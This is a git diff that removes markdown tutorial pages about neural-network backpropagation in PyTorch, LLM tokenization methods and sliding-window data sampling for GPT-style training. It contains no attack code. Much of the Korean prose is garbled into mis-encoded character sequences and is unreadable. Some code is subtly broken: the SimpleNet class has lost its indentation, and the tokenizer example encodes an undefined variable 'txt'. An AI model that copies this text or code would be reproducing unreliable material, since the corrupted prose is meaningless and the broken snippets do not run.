๋Œ€ํ•œ ์†์‹ค์˜ ๊ธฐ์šธ๊ธฐ๋ฅผ ๊ณ„์‚ฐํ•ฉ๋‹ˆ๋‹ค. - -### **2. Backpropagation ์•Œ๊ณ ๋ฆฌ์ฆ˜** - -- **Step 1:** ๋„คํŠธ์›Œํฌ ๋งค๊ฐœ๋ณ€์ˆ˜(๊ฐ€์ค‘์น˜ ๋ฐ ํŽธํ–ฅ)๋ฅผ ์ดˆ๊ธฐํ™”ํ•ฉ๋‹ˆ๋‹ค. -- **Step 2:** ๊ฐ ํ›ˆ๋ จ ์˜ˆ์ œ์— ๋Œ€ํ•ด ์ถœ๋ ฅ์„ ๊ณ„์‚ฐํ•˜๊ธฐ ์œ„ํ•ด forward pass๋ฅผ ์ˆ˜ํ–‰ํ•ฉ๋‹ˆ๋‹ค. -- **Step 3:** ์†์‹ค์„ ๊ณ„์‚ฐํ•ฉ๋‹ˆ๋‹ค. -- **Step 4:** ์ฒด์ธ ๋ฃฐ์„ ์‚ฌ์šฉํ•˜์—ฌ ๊ฐ ๋งค๊ฐœ๋ณ€์ˆ˜์— ๋Œ€ํ•œ ์†์‹ค์˜ ๊ธฐ์šธ๊ธฐ๋ฅผ ๊ณ„์‚ฐํ•ฉ๋‹ˆ๋‹ค. -- **Step 5:** ์ตœ์ ํ™” ์•Œ๊ณ ๋ฆฌ์ฆ˜(์˜ˆ: ๊ฒฝ๋Ÿ‰ ํ•˜๊ฐ•๋ฒ•)์„ ์‚ฌ์šฉํ•˜์—ฌ ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ์—…๋ฐ์ดํŠธํ•ฉ๋‹ˆ๋‹ค. - -### **3. ์ˆ˜ํ•™์  ํ‘œํ˜„** - -ํ•˜๋‚˜์˜ ์€๋‹‰์ธต์„ ๊ฐ€์ง„ ๊ฐ„๋‹จํ•œ ์‹ ๊ฒฝ๋ง์„ ๊ณ ๋ คํ•ด ๋ณด์‹ญ์‹œ์˜ค: - -
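A sketch of the forward computation, written to match the `SimpleNet` implementation below:

```math
h = \mathrm{ReLU}(W_1 x + b_1), \qquad \hat{y} = \sigma(W_2 h + b_2), \qquad L = \mathrm{BCE}(\hat{y}, y)
```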
- -### **4. PyTorch ๊ตฌํ˜„** - -PyTorch๋Š” autograd ์—”์ง„์„ ํ†ตํ•ด ์ด ๊ณผ์ •์„ ๊ฐ„์†Œํ™”ํ•ฉ๋‹ˆ๋‹ค. -```python -import torch -import torch.nn as nn -import torch.optim as optim - -# Define a simple neural network -class SimpleNet(nn.Module): -def __init__(self): -super(SimpleNet, self).__init__() -self.fc1 = nn.Linear(10, 5) # Input layer to hidden layer -self.relu = nn.ReLU() -self.fc2 = nn.Linear(5, 1) # Hidden layer to output layer -self.sigmoid = nn.Sigmoid() - -def forward(self, x): -h = self.relu(self.fc1(x)) -y_hat = self.sigmoid(self.fc2(h)) -return y_hat - -# Instantiate the network -net = SimpleNet() - -# Define loss function and optimizer -criterion = nn.BCELoss() -optimizer = optim.SGD(net.parameters(), lr=0.01) - -# Sample data -inputs = torch.randn(1, 10) -labels = torch.tensor([1.0]) - -# Training loop -optimizer.zero_grad() # Clear gradients -outputs = net(inputs) # Forward pass -loss = criterion(outputs, labels) # Compute loss -loss.backward() # Backward pass (compute gradients) -optimizer.step() # Update parameters - -# Accessing gradients -for name, param in net.named_parameters(): -if param.requires_grad: -print(f"Gradient of {name}: {param.grad}") -``` -In this code: - -- **Forward Pass:** ๋„คํŠธ์›Œํฌ์˜ ์ถœ๋ ฅ์„ ๊ณ„์‚ฐํ•ฉ๋‹ˆ๋‹ค. -- **Backward Pass:** `loss.backward()`๋Š” ์†์‹ค์— ๋Œ€ํ•œ ๋ชจ๋“  ๋งค๊ฐœ๋ณ€์ˆ˜์˜ ๊ธฐ์šธ๊ธฐ๋ฅผ ๊ณ„์‚ฐํ•ฉ๋‹ˆ๋‹ค. -- **Parameter Update:** `optimizer.step()`๋Š” ๊ณ„์‚ฐ๋œ ๊ธฐ์šธ๊ธฐ๋ฅผ ๊ธฐ๋ฐ˜์œผ๋กœ ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ์—…๋ฐ์ดํŠธํ•ฉ๋‹ˆ๋‹ค. - -### **5. Understanding Backward Pass** - -์—ญ์ „ํŒŒ ๋™์•ˆ: - -- PyTorch๋Š” ๊ณ„์‚ฐ ๊ทธ๋ž˜ํ”„๋ฅผ ์—ญ์ˆœ์œผ๋กœ ํƒ์ƒ‰ํ•ฉ๋‹ˆ๋‹ค. -- ๊ฐ ์—ฐ์‚ฐ์— ๋Œ€ํ•ด ์ฒด์ธ ๋ฃฐ์„ ์ ์šฉํ•˜์—ฌ ๊ธฐ์šธ๊ธฐ๋ฅผ ๊ณ„์‚ฐํ•ฉ๋‹ˆ๋‹ค. -- ๊ธฐ์šธ๊ธฐ๋Š” ๊ฐ ๋งค๊ฐœ๋ณ€์ˆ˜ ํ…์„œ์˜ `.grad` ์†์„ฑ์— ๋ˆ„์ ๋ฉ๋‹ˆ๋‹ค. - -### **6. Advantages of Automatic Differentiation** - -- **Efficiency:** ์ค‘๊ฐ„ ๊ฒฐ๊ณผ๋ฅผ ์žฌ์‚ฌ์šฉํ•˜์—ฌ ์ค‘๋ณต ๊ณ„์‚ฐ์„ ํ”ผํ•ฉ๋‹ˆ๋‹ค. -- **Accuracy:** ๊ธฐ๊ณ„ ์ •๋ฐ€๋„๊นŒ์ง€ ์ •ํ™•ํ•œ ๋„ํ•จ์ˆ˜๋ฅผ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. -- **Ease of Use:** ๋„ํ•จ์ˆ˜์˜ ์ˆ˜๋™ ๊ณ„์‚ฐ์„ ์ œ๊ฑฐํ•ฉ๋‹ˆ๋‹ค. diff --git a/src/todo/llm-training-data-preparation/1.-tokenizing.md b/src/todo/llm-training-data-preparation/1.-tokenizing.md deleted file mode 100644 index e1f592a3d..000000000 --- a/src/todo/llm-training-data-preparation/1.-tokenizing.md +++ /dev/null @@ -1,95 +0,0 @@ -# 1. ํ† ํฐํ™” - -## ํ† ํฐํ™” - -**ํ† ํฐํ™”**๋Š” ํ…์ŠคํŠธ์™€ ๊ฐ™์€ ๋ฐ์ดํ„ฐ๋ฅผ ๋” ์ž‘๊ณ  ๊ด€๋ฆฌ ๊ฐ€๋Šฅํ•œ ์กฐ๊ฐ์ธ _ํ† ํฐ_์œผ๋กœ ๋‚˜๋ˆ„๋Š” ๊ณผ์ •์ž…๋‹ˆ๋‹ค. ๊ฐ ํ† ํฐ์€ ๊ณ ์œ ํ•œ ์ˆซ์ž ์‹๋ณ„์ž(ID)๊ฐ€ ํ• ๋‹น๋ฉ๋‹ˆ๋‹ค. ์ด๋Š” ๊ธฐ๊ณ„ ํ•™์Šต ๋ชจ๋ธ, ํŠนํžˆ ์ž์—ฐ์–ด ์ฒ˜๋ฆฌ(NLP)๋ฅผ ์œ„ํ•œ ํ…์ŠคํŠธ ์ค€๋น„์˜ ๊ธฐ๋ณธ ๋‹จ๊ณ„์ž…๋‹ˆ๋‹ค. - -> [!TIP] -> ์ด ์ดˆ๊ธฐ ๋‹จ๊ณ„์˜ ๋ชฉํ‘œ๋Š” ๋งค์šฐ ๊ฐ„๋‹จํ•ฉ๋‹ˆ๋‹ค: **์ž…๋ ฅ์„ ์˜๋ฏธ ์žˆ๋Š” ๋ฐฉ์‹์œผ๋กœ ํ† ํฐ(IDs)์œผ๋กœ ๋‚˜๋ˆ„๊ธฐ**์ž…๋‹ˆ๋‹ค. - -### **ํ† ํฐํ™” ์ž‘๋™ ๋ฐฉ์‹** - -1. **ํ…์ŠคํŠธ ๋ถ„ํ• :** -- **๊ธฐ๋ณธ ํ† ํฌ๋‚˜์ด์ €:** ๊ฐ„๋‹จํ•œ ํ† ํฌ๋‚˜์ด์ €๋Š” ํ…์ŠคํŠธ๋ฅผ ๊ฐœ๋ณ„ ๋‹จ์–ด์™€ ๊ตฌ๋‘์ ์œผ๋กœ ๋‚˜๋ˆ„๊ณ  ๊ณต๋ฐฑ์„ ์ œ๊ฑฐํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -- _์˜ˆ:_\ -ํ…์ŠคํŠธ: `"Hello, world!"`\ -ํ† ํฐ: `["Hello", ",", "world", "!"]` -2. **์–ดํœ˜ ์ƒ์„ฑ:** -- ํ† ํฐ์„ ์ˆซ์ž ID๋กœ ๋ณ€ํ™˜ํ•˜๊ธฐ ์œ„ํ•ด **์–ดํœ˜**๊ฐ€ ์ƒ์„ฑ๋ฉ๋‹ˆ๋‹ค. ์ด ์–ดํœ˜๋Š” ๋ชจ๋“  ๊ณ ์œ  ํ† ํฐ(๋‹จ์–ด ๋ฐ ๊ธฐํ˜ธ)์„ ๋‚˜์—ดํ•˜๊ณ  ๊ฐ ํ† ํฐ์— ํŠน์ • ID๋ฅผ ํ• ๋‹นํ•ฉ๋‹ˆ๋‹ค. -- **ํŠน์ˆ˜ ํ† ํฐ:** ๋‹ค์–‘ํ•œ ์‹œ๋‚˜๋ฆฌ์˜ค๋ฅผ ์ฒ˜๋ฆฌํ•˜๊ธฐ ์œ„ํ•ด ์–ดํœ˜์— ์ถ”๊ฐ€๋œ ํŠน์ˆ˜ ๊ธฐํ˜ธ์ž…๋‹ˆ๋‹ค: -- `[BOS]` (์‹œํ€€์Šค ์‹œ์ž‘): ํ…์ŠคํŠธ์˜ ์‹œ์ž‘์„ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค. 
-- `[EOS]` (์‹œํ€€์Šค ๋): ํ…์ŠคํŠธ์˜ ๋์„ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค. -- `[PAD]` (ํŒจ๋”ฉ): ๋ฐฐ์น˜์˜ ๋ชจ๋“  ์‹œํ€€์Šค๋ฅผ ๋™์ผํ•œ ๊ธธ์ด๋กœ ๋งŒ๋“ค๊ธฐ ์œ„ํ•ด ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. -- `[UNK]` (์•Œ ์ˆ˜ ์—†์Œ): ์–ดํœ˜์— ์—†๋Š” ํ† ํฐ์„ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค. -- _์˜ˆ:_\ -`"Hello"`๊ฐ€ ID `64`์— ํ• ๋‹น๋˜๊ณ , `","`๊ฐ€ `455`, `"world"`๊ฐ€ `78`, `"!"`๊ฐ€ `467`์ด๋ผ๋ฉด:\ -`"Hello, world!"` โ†’ `[64, 455, 78, 467]` -- **์•Œ ์ˆ˜ ์—†๋Š” ๋‹จ์–ด ์ฒ˜๋ฆฌ:**\ -`"Bye"`์™€ ๊ฐ™์€ ๋‹จ์–ด๊ฐ€ ์–ดํœ˜์— ์—†์œผ๋ฉด `[UNK]`๋กœ ๋Œ€์ฒด๋ฉ๋‹ˆ๋‹ค.\ -`"Bye, world!"` โ†’ `["[UNK]", ",", "world", "!"]` โ†’ `[987, 455, 78, 467]`\ -_(์—ฌ๊ธฐ์„œ `[UNK]`์˜ ID๋Š” `987`๋ผ๊ณ  ๊ฐ€์ •ํ•ฉ๋‹ˆ๋‹ค)_ - -### **๊ณ ๊ธ‰ ํ† ํฐํ™” ๋ฐฉ๋ฒ•** - -๊ธฐ๋ณธ ํ† ํฌ๋‚˜์ด์ €๋Š” ๊ฐ„๋‹จํ•œ ํ…์ŠคํŠธ์— ์ž˜ ์ž‘๋™ํ•˜์ง€๋งŒ, ํŠนํžˆ ํฐ ์–ดํœ˜์™€ ์ƒˆ๋กœ์šด ๋˜๋Š” ํฌ๊ท€ํ•œ ๋‹จ์–ด๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ๋ฐ ํ•œ๊ณ„๊ฐ€ ์žˆ์Šต๋‹ˆ๋‹ค. ๊ณ ๊ธ‰ ํ† ํฐํ™” ๋ฐฉ๋ฒ•์€ ํ…์ŠคํŠธ๋ฅผ ๋” ์ž‘์€ ํ•˜์œ„ ๋‹จ์œ„๋กœ ๋‚˜๋ˆ„๊ฑฐ๋‚˜ ํ† ํฐํ™” ํ”„๋กœ์„ธ์Šค๋ฅผ ์ตœ์ ํ™”ํ•˜์—ฌ ์ด๋Ÿฌํ•œ ๋ฌธ์ œ๋ฅผ ํ•ด๊ฒฐํ•ฉ๋‹ˆ๋‹ค. - -1. **๋ฐ”์ดํŠธ ์Œ ์ธ์ฝ”๋”ฉ(BPE):** -- **๋ชฉ์ :** ์–ดํœ˜์˜ ํฌ๊ธฐ๋ฅผ ์ค„์ด๊ณ  ํฌ๊ท€ํ•˜๊ฑฐ๋‚˜ ์•Œ ์ˆ˜ ์—†๋Š” ๋‹จ์–ด๋ฅผ ์ž์ฃผ ๋ฐœ์ƒํ•˜๋Š” ๋ฐ”์ดํŠธ ์Œ์œผ๋กœ ๋‚˜๋ˆ„์–ด ์ฒ˜๋ฆฌํ•ฉ๋‹ˆ๋‹ค. -- **์ž‘๋™ ๋ฐฉ์‹:** -- ๊ฐœ๋ณ„ ๋ฌธ์ž๋ฅผ ํ† ํฐ์œผ๋กœ ์‹œ์ž‘ํ•ฉ๋‹ˆ๋‹ค. -- ๊ฐ€์žฅ ์ž์ฃผ ๋ฐœ์ƒํ•˜๋Š” ํ† ํฐ ์Œ์„ ๋ฐ˜๋ณต์ ์œผ๋กœ ๋ณ‘ํ•ฉํ•˜์—ฌ ๋‹จ์ผ ํ† ํฐ์œผ๋กœ ๋งŒ๋“ญ๋‹ˆ๋‹ค. -- ๋” ์ด์ƒ ๋ณ‘ํ•ฉํ•  ์ˆ˜ ์žˆ๋Š” ์ž์ฃผ ๋ฐœ์ƒํ•˜๋Š” ์Œ์ด ์—†์„ ๋•Œ๊นŒ์ง€ ๊ณ„์†ํ•ฉ๋‹ˆ๋‹ค. -- **์žฅ์ :** -- ๋ชจ๋“  ๋‹จ์–ด๊ฐ€ ๊ธฐ์กด ํ•˜์œ„ ๋‹จ์–ด ํ† ํฐ์„ ๊ฒฐํ•ฉํ•˜์—ฌ ํ‘œํ˜„๋  ์ˆ˜ ์žˆ์œผ๋ฏ€๋กœ `[UNK]` ํ† ํฐ์ด ํ•„์š” ์—†์Šต๋‹ˆ๋‹ค. -- ๋” ํšจ์œจ์ ์ด๊ณ  ์œ ์—ฐํ•œ ์–ดํœ˜์ž…๋‹ˆ๋‹ค. -- _์˜ˆ:_\ -`"playing"`์€ `"play"`์™€ `"ing"`๊ฐ€ ์ž์ฃผ ๋ฐœ์ƒํ•˜๋Š” ํ•˜์œ„ ๋‹จ์–ด๋ผ๋ฉด `["play", "ing"]`๋กœ ํ† ํฐํ™”๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -2. **WordPiece:** -- **์‚ฌ์šฉ ๋ชจ๋ธ:** BERT์™€ ๊ฐ™์€ ๋ชจ๋ธ. -- **๋ชฉ์ :** BPE์™€ ์œ ์‚ฌํ•˜๊ฒŒ, ์•Œ ์ˆ˜ ์—†๋Š” ๋‹จ์–ด๋ฅผ ์ฒ˜๋ฆฌํ•˜๊ณ  ์–ดํœ˜ ํฌ๊ธฐ๋ฅผ ์ค„์ด๊ธฐ ์œ„ํ•ด ๋‹จ์–ด๋ฅผ ํ•˜์œ„ ๋‹จ์œ„๋กœ ๋‚˜๋ˆ•๋‹ˆ๋‹ค. -- **์ž‘๋™ ๋ฐฉ์‹:** -- ๊ฐœ๋ณ„ ๋ฌธ์ž์˜ ๊ธฐ๋ณธ ์–ดํœ˜๋กœ ์‹œ์ž‘ํ•ฉ๋‹ˆ๋‹ค. -- ํ›ˆ๋ จ ๋ฐ์ดํ„ฐ์˜ ๊ฐ€๋Šฅ์„ฑ์„ ๊ทน๋Œ€ํ™”ํ•˜๋Š” ๊ฐ€์žฅ ์ž์ฃผ ๋ฐœ์ƒํ•˜๋Š” ํ•˜์œ„ ๋‹จ์–ด๋ฅผ ๋ฐ˜๋ณต์ ์œผ๋กœ ์ถ”๊ฐ€ํ•ฉ๋‹ˆ๋‹ค. -- ์–ด๋–ค ํ•˜์œ„ ๋‹จ์–ด๋ฅผ ๋ณ‘ํ•ฉํ• ์ง€ ๊ฒฐ์ •ํ•˜๊ธฐ ์œ„ํ•ด ํ™•๋ฅ  ๋ชจ๋ธ์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **์žฅ์ :** -- ๊ด€๋ฆฌ ๊ฐ€๋Šฅํ•œ ์–ดํœ˜ ํฌ๊ธฐ์™€ ํšจ๊ณผ์ ์ธ ๋‹จ์–ด ํ‘œํ˜„ ์‚ฌ์ด์˜ ๊ท ํ˜•์„ ์œ ์ง€ํ•ฉ๋‹ˆ๋‹ค. -- ํฌ๊ท€ํ•˜๊ณ  ๋ณตํ•ฉ์ ์ธ ๋‹จ์–ด๋ฅผ ํšจ์œจ์ ์œผ๋กœ ์ฒ˜๋ฆฌํ•ฉ๋‹ˆ๋‹ค. -- _์˜ˆ:_\ -`"unhappiness"`๋Š” ์–ดํœ˜์— ๋”ฐ๋ผ `["un", "happiness"]` ๋˜๋Š” `["un", "happy", "ness"]`๋กœ ํ† ํฐํ™”๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -3. **์œ ๋‹ˆ๊ทธ๋žจ ์–ธ์–ด ๋ชจ๋ธ:** -- **์‚ฌ์šฉ ๋ชจ๋ธ:** SentencePiece์™€ ๊ฐ™์€ ๋ชจ๋ธ. -- **๋ชฉ์ :** ๊ฐ€์žฅ ๊ฐ€๋Šฅ์„ฑ์ด ๋†’์€ ํ•˜์œ„ ๋‹จ์–ด ํ† ํฐ ์ง‘ํ•ฉ์„ ๊ฒฐ์ •ํ•˜๊ธฐ ์œ„ํ•ด ํ™•๋ฅ  ๋ชจ๋ธ์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **์ž‘๋™ ๋ฐฉ์‹:** -- ์ž ์žฌ์ ์ธ ํ† ํฐ์˜ ํฐ ์ง‘ํ•ฉ์œผ๋กœ ์‹œ์ž‘ํ•ฉ๋‹ˆ๋‹ค. -- ํ›ˆ๋ จ ๋ฐ์ดํ„ฐ์˜ ๋ชจ๋ธ ํ™•๋ฅ ์„ ๊ฐ€์žฅ ์ ๊ฒŒ ๊ฐœ์„ ํ•˜๋Š” ํ† ํฐ์„ ๋ฐ˜๋ณต์ ์œผ๋กœ ์ œ๊ฑฐํ•ฉ๋‹ˆ๋‹ค. -- ๊ฐ ๋‹จ์–ด๊ฐ€ ๊ฐ€์žฅ ๊ฐ€๋Šฅ์„ฑ์ด ๋†’์€ ํ•˜์œ„ ๋‹จ์œ„๋กœ ํ‘œํ˜„๋˜๋Š” ์–ดํœ˜๋ฅผ ์ตœ์ข…ํ™”ํ•ฉ๋‹ˆ๋‹ค. -- **์žฅ์ :** -- ์œ ์—ฐํ•˜๋ฉฐ ์–ธ์–ด๋ฅผ ๋” ์ž์—ฐ์Šค๋Ÿฝ๊ฒŒ ๋ชจ๋ธ๋งํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -- ์ข…์ข… ๋” ํšจ์œจ์ ์ด๊ณ  ๊ฐ„๊ฒฐํ•œ ํ† ํฐํ™”๋ฅผ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. -- _์˜ˆ:_\ -`"internationalization"`์€ `["international", "ization"]`๊ณผ ๊ฐ™์€ ๋” ์ž‘๊ณ  ์˜๋ฏธ ์žˆ๋Š” ํ•˜์œ„ ๋‹จ์–ด๋กœ ํ† ํฐํ™”๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. 
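To make the BPE idea above concrete, here is a minimal, illustrative sketch of the merge loop (the toy corpus, helper names and number of merge steps are invented for the example; real tokenizers such as `tiktoken` implement a heavily optimized version of the same idea):

```python
from collections import Counter

def get_pair_counts(words):
    """Count how often each adjacent symbol pair occurs, weighted by word frequency."""
    pairs = Counter()
    for symbols, freq in words.items():
        for a, b in zip(symbols, symbols[1:]):
            pairs[(a, b)] += freq
    return pairs

def merge_pair(pair, words):
    """Replace every occurrence of `pair` with a single merged symbol."""
    merged = {}
    for symbols, freq in words.items():
        out, i = [], 0
        while i < len(symbols):
            if i < len(symbols) - 1 and (symbols[i], symbols[i + 1]) == pair:
                out.append(symbols[i] + symbols[i + 1])
                i += 2
            else:
                out.append(symbols[i])
                i += 1
        key = tuple(out)
        merged[key] = merged.get(key, 0) + freq
    return merged

# Toy corpus: each word is pre-split into characters and mapped to its frequency
words = {
    ("l", "o", "w"): 5,
    ("l", "o", "w", "e", "r"): 2,
    ("n", "e", "w", "e", "s", "t"): 6,
}

for step in range(4):
    pair_counts = get_pair_counts(words)
    best = max(pair_counts, key=pair_counts.get)  # most frequent adjacent pair
    words = merge_pair(best, words)
    print(f"Merge {step + 1}: {best} -> {best[0] + best[1]}")
```

Each printed merge becomes a new vocabulary entry, so frequent fragments such as `we` or `lo` end up represented as single tokens.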
- -## ์ฝ”๋“œ ์˜ˆ์ œ - -๋‹ค์Œ์€ [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb)์—์„œ ๊ฐ€์ ธ์˜จ ์ฝ”๋“œ ์˜ˆ์ œ๋ฅผ ํ†ตํ•ด ์ด๋ฅผ ๋” ์ž˜ ์ดํ•ดํ•ด ๋ด…์‹œ๋‹ค. -```python -# Download a text to pre-train the model -import urllib.request -url = ("https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt") -file_path = "the-verdict.txt" -urllib.request.urlretrieve(url, file_path) - -with open("the-verdict.txt", "r", encoding="utf-8") as f: -raw_text = f.read() - -# Tokenize the code using GPT2 tokenizer version -import tiktoken -token_ids = tiktoken.get_encoding("gpt2").encode(txt, allowed_special={"[EOS]"}) # Allow the user of the tag "[EOS]" - -# Print first 50 tokens -print(token_ids[:50]) -#[40, 367, 2885, 1464, 1807, 3619, 402, 271, 10899, 2138, 257, 7026, 15632, 438, 2016, 257, 922, 5891, 1576, 438, 568, 340, 373, 645, 1049, 5975, 284, 502, 284, 3285, 326, 11, 287, 262, 6001, 286, 465, 13476, 11, 339, 550, 5710, 465, 12036, 11, 6405, 257, 5527, 27075, 11] -``` -## References - -- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) diff --git a/src/todo/llm-training-data-preparation/2.-data-sampling.md b/src/todo/llm-training-data-preparation/2.-data-sampling.md deleted file mode 100644 index 9909261e1..000000000 --- a/src/todo/llm-training-data-preparation/2.-data-sampling.md +++ /dev/null @@ -1,240 +0,0 @@ -# 2. Data Sampling - -## **Data Sampling** - -**Data Sampling** is a crucial process in preparing data for training large language models (LLMs) like GPT. It involves organizing text data into input and target sequences that the model uses to learn how to predict the next word (or token) based on the preceding words. Proper data sampling ensures that the model effectively captures language patterns and dependencies. - -> [!TIP] -> The goal of this second phase is very simple: **Sample the input data and prepare it for the training phase usually by separating the dataset into sentences of a specific length and generating also the expected response.** - -### **Why Data Sampling Matters** - -LLMs such as GPT are trained to generate or predict text by understanding the context provided by previous words. To achieve this, the training data must be structured in a way that the model can learn the relationship between sequences of words and their subsequent words. This structured approach allows the model to generalize and generate coherent and contextually relevant text. - -### **Key Concepts in Data Sampling** - -1. **Tokenization:** Breaking down text into smaller units called tokens (e.g., words, subwords, or characters). -2. **Sequence Length (max_length):** The number of tokens in each input sequence. -3. **Sliding Window:** A method to create overlapping input sequences by moving a window over the tokenized text. -4. **Stride:** The number of tokens the sliding window moves forward to create the next sequence. - -### **Step-by-Step Example** - -Let's walk through an example to illustrate data sampling. - -**Example Text** - -```arduino -"Lorem ipsum dolor sit amet, consectetur adipiscing elit." 
-``` - -**Tokenization** - -Assume we use a **basic tokenizer** that splits the text into words and punctuation marks: - -```vbnet -Tokens: ["Lorem", "ipsum", "dolor", "sit", "amet,", "consectetur", "adipiscing", "elit."] -``` - -**Parameters** - -- **Max Sequence Length (max_length):** 4 tokens -- **Sliding Window Stride:** 1 token - -**Creating Input and Target Sequences** - -1. **Sliding Window Approach:** - - **Input Sequences:** Each input sequence consists of `max_length` tokens. - - **Target Sequences:** Each target sequence consists of the tokens that immediately follow the corresponding input sequence. -2. **Generating Sequences:** - -
| Window Position | Input Sequence | Target Sequence |
|---|---|---|
| 1 | ["Lorem", "ipsum", "dolor", "sit"] | ["ipsum", "dolor", "sit", "amet,"] |
| 2 | ["ipsum", "dolor", "sit", "amet,"] | ["dolor", "sit", "amet,", "consectetur"] |
| 3 | ["dolor", "sit", "amet,", "consectetur"] | ["sit", "amet,", "consectetur", "adipiscing"] |
| 4 | ["sit", "amet,", "consectetur", "adipiscing"] | ["amet,", "consectetur", "adipiscing", "elit."] |
- -3. **Resulting Input and Target Arrays:** - - - **Input:** - - ```python - [ - ["Lorem", "ipsum", "dolor", "sit"], - ["ipsum", "dolor", "sit", "amet,"], - ["dolor", "sit", "amet,", "consectetur"], - ["sit", "amet,", "consectetur", "adipiscing"], - ] - ``` - - - **Target:** - - ```python - [ - ["ipsum", "dolor", "sit", "amet,"], - ["dolor", "sit", "amet,", "consectetur"], - ["sit", "amet,", "consectetur", "adipiscing"], - ["amet,", "consectetur", "adipiscing", "elit."], - ] - ``` - -**Visual Representation** - -
| Token Position | Token |
|---|---|
| 1 | Lorem |
| 2 | ipsum |
| 3 | dolor |
| 4 | sit |
| 5 | amet, |
| 6 | consectetur |
| 7 | adipiscing |
| 8 | elit. |
- -**Sliding Window with Stride 1:** - -- **First Window (Positions 1-4):** \["Lorem", "ipsum", "dolor", "sit"] โ†’ **Target:** \["ipsum", "dolor", "sit", "amet,"] -- **Second Window (Positions 2-5):** \["ipsum", "dolor", "sit", "amet,"] โ†’ **Target:** \["dolor", "sit", "amet,", "consectetur"] -- **Third Window (Positions 3-6):** \["dolor", "sit", "amet,", "consectetur"] โ†’ **Target:** \["sit", "amet,", "consectetur", "adipiscing"] -- **Fourth Window (Positions 4-7):** \["sit", "amet,", "consectetur", "adipiscing"] โ†’ **Target:** \["amet,", "consectetur", "adipiscing", "elit."] - -**Understanding Stride** - -- **Stride of 1:** The window moves forward by one token each time, resulting in highly overlapping sequences. This can lead to better learning of contextual relationships but may increase the risk of overfitting since similar data points are repeated. -- **Stride of 2:** The window moves forward by two tokens each time, reducing overlap. This decreases redundancy and computational load but might miss some contextual nuances. -- **Stride Equal to max_length:** The window moves forward by the entire window size, resulting in non-overlapping sequences. This minimizes data redundancy but may limit the model's ability to learn dependencies across sequences. - -**Example with Stride of 2:** - -Using the same tokenized text and `max_length` of 4: - -- **First Window (Positions 1-4):** \["Lorem", "ipsum", "dolor", "sit"] โ†’ **Target:** \["ipsum", "dolor", "sit", "amet,"] -- **Second Window (Positions 3-6):** \["dolor", "sit", "amet,", "consectetur"] โ†’ **Target:** \["sit", "amet,", "consectetur", "adipiscing"] -- **Third Window (Positions 5-8):** \["amet,", "consectetur", "adipiscing", "elit."] โ†’ **Target:** \["consectetur", "adipiscing", "elit.", "sed"] _(Assuming continuation)_ - -## Code Example - -Let's understand this better from a code example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb): - -```python -# Download the text to pre-train the LLM -import urllib.request -url = ("https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt") -file_path = "the-verdict.txt" -urllib.request.urlretrieve(url, file_path) - -with open("the-verdict.txt", "r", encoding="utf-8") as f: - raw_text = f.read() - -""" -Create a class that will receive some params lie tokenizer and text -and will prepare the input chunks and the target chunks to prepare -the LLM to learn which next token to generate -""" -import torch -from torch.utils.data import Dataset, DataLoader - -class GPTDatasetV1(Dataset): - def __init__(self, txt, tokenizer, max_length, stride): - self.input_ids = [] - self.target_ids = [] - - # Tokenize the entire text - token_ids = tokenizer.encode(txt, allowed_special={"<|endoftext|>"}) - - # Use a sliding window to chunk the book into overlapping sequences of max_length - for i in range(0, len(token_ids) - max_length, stride): - input_chunk = token_ids[i:i + max_length] - target_chunk = token_ids[i + 1: i + max_length + 1] - self.input_ids.append(torch.tensor(input_chunk)) - self.target_ids.append(torch.tensor(target_chunk)) - - def __len__(self): - return len(self.input_ids) - - def __getitem__(self, idx): - return self.input_ids[idx], self.target_ids[idx] - - -""" -Create a data loader which given the text and some params will -prepare the inputs and targets with the previous class and -then create a 
torch DataLoader with the info -""" - -import tiktoken - -def create_dataloader_v1(txt, batch_size=4, max_length=256, - stride=128, shuffle=True, drop_last=True, - num_workers=0): - - # Initialize the tokenizer - tokenizer = tiktoken.get_encoding("gpt2") - - # Create dataset - dataset = GPTDatasetV1(txt, tokenizer, max_length, stride) - - # Create dataloader - dataloader = DataLoader( - dataset, - batch_size=batch_size, - shuffle=shuffle, - drop_last=drop_last, - num_workers=num_workers - ) - - return dataloader - - -""" -Finally, create the data loader with the params we want: -- The used text for training -- batch_size: The size of each batch -- max_length: The size of each entry on each batch -- stride: The sliding window (how many tokens should the next entry advance compared to the previous one). The smaller the more overfitting, usually this is equals to the max_length so the same tokens aren't repeated. -- shuffle: Re-order randomly -""" -dataloader = create_dataloader_v1( - raw_text, batch_size=8, max_length=4, stride=1, shuffle=False -) - -data_iter = iter(dataloader) -first_batch = next(data_iter) -print(first_batch) - -# Note the batch_size of 8, the max_length of 4 and the stride of 1 -[ -# Input -tensor([[ 40, 367, 2885, 1464], - [ 367, 2885, 1464, 1807], - [ 2885, 1464, 1807, 3619], - [ 1464, 1807, 3619, 402], - [ 1807, 3619, 402, 271], - [ 